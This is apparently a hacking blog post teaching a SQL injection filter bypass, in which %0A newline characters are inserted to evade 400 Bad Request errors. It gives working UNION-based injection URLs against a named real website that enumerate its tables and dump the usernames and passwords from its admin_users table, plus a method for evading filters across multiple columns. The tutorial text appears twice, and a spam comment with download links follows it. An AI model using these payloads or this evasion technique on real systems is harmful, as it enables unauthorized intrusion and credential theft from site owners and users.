400 Bad Request Bypass
# 400 bad request #
Ok so today i will teach you how to bypass 400 error
Ok so you trying to SQLI website and then 400 error appears :\ ( it's mean that your browser sent a request that this server could not understand ) it shoud look like this ( btw that website have have 1 column at the end ill try to explain what to do when there are more colums ) :![[IMG]](http://i49.tinypic.com/20fqnlu.png)
Also link if you wanna check it www.krumplitas.lt/index2.php?id=-1' union select group_concat(table_name)from information_schema.tables where table_schema=database()--+
First thing we need to do is to write %0A after union and before select ( union%0Aselect ) so it should look like :![[IMG]](http://i46.tinypic.com/2rco7xg.png)
Link : www.krumplitas.lt/index2.php?id=-1' union%0Aselect group_concat(table_name)from information_schema.tables where table_schema=database()--+
And yeah you bypassed that error
now we need to get information from table admin_users and when you try with union%0Aselect error appears again!
What we need to do is write another %0A at the CHARS=(97%0A, 101 , 96 .........)
ok so lets see whats happen the link is www.krumplitas.lt/index2.php?id=-1'union%0Aselect group_concat(column_name) from information_schema.columns where table_name=CHAR(97%0A,100, 109, 105, 110, 95, 117, 115, 101, 114, 115)--+
![[IMG]](http://i50.tinypic.com/iyq8ut.png)
and there you see you got information from admin_users !
and for the end link is www.krumplitas.lt/index2.php?id=-1'union%0Aselect group_concat(vardas,0x3a,slaptazodis) from admin_users--+
just add %0A after union and before select ( union%0Aselect )
and there you go you have login details! :![[IMG]](http://i48.tinypic.com/2zjgg74.png)
But sometimes you also need to know where error begins! for example website have 20 columns... for example :
site.com/something.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+/
And you see 400 error ;\ and you need to figure out where error start like :
site.com/somthing.php?id=1' union ( no error )
site.com/somthing.php?id=1' union select 1 +--+/ ( still no error )
site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12+--+/ ( still no error )
site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13+--+/ ( And error! )
So we know error starts at 13... so then you just add 13--+%0A,14--+%0A,15--+%0A untill you write all your columns so full url with 20 columns and error at 13 should look like : site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+%0A,14--+%0A,15--+%0A,16--+%0A,17--+%0A,18--+%0A,19--+%0A,20--+%0A--+
Ok so today i will teach you how to bypass 400 error
Ok so you trying to SQLI website and then 400 error appears :\ ( it's mean that your browser sent a request that this server could not understand ) it shoud look like this ( btw that website have have 1 column at the end ill try to explain what to do when there are more colums ) :
Also link if you wanna check it www.krumplitas.lt/index2.php?id=-1' union select group_concat(table_name)from information_schema.tables where table_schema=database()--+First thing we need to do is to write %0A after union and before select ( union%0Aselect ) so it should look like :
Link : www.krumplitas.lt/index2.php?id=-1' union%0Aselect group_concat(table_name)from information_schema.tables where table_schema=database()--+And yeah you bypassed that error
now we need to get information from table admin_users and when you try with union%0Aselect error appears again!
What we need to do is write another %0A at the CHARS=(97%0A, 101 , 96 .........)
ok so lets see whats happen the link is www.krumplitas.lt/index2.php?id=-1'union%0Aselect group_concat(column_name) from information_schema.columns where table_name=CHAR(97%0A,100, 109, 105, 110, 95, 117, 115, 101, 114, 115)--+
and there you see you got information from admin_users !
and for the end link is www.krumplitas.lt/index2.php?id=-1'union%0Aselect group_concat(vardas,0x3a,slaptazodis) from admin_users--+
just add %0A after union and before select ( union%0Aselect )
and there you go you have login details! :
But sometimes you also need to know where error begins! for example website have 20 columns... for example :
site.com/something.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+/
And you see 400 error ;\ and you need to figure out where error start like :
site.com/somthing.php?id=1' union ( no error )
site.com/somthing.php?id=1' union select 1 +--+/ ( still no error )
site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12+--+/ ( still no error )
site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13+--+/ ( And error! )
So we know error starts at 13... so then you just add 13--+%0A,14--+%0A,15--+%0A untill you write all your columns
so full url with 20 columns and error at 13 should look like : site.com/somthing.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13--+%0A,14--+%0A,15--+%0A,16--+%0A,17--+%0A,18--+%0A,19--+%0A,20--+%0A--+Tags: 400 error
Previous Article
Subscribe to:
Post Comments (Atom)
Share your views...
1 Respones to "400 Bad Request Bypass"
400 Bad Request Bypass >>>>> Download Now
>>>>> Download Full
400 Bad Request Bypass >>>>> Download LINK
>>>>> Download Now
400 Bad Request Bypass >>>>> Download Full
>>>>> Download LINK
27 March 2022 at 04:29
Post a Comment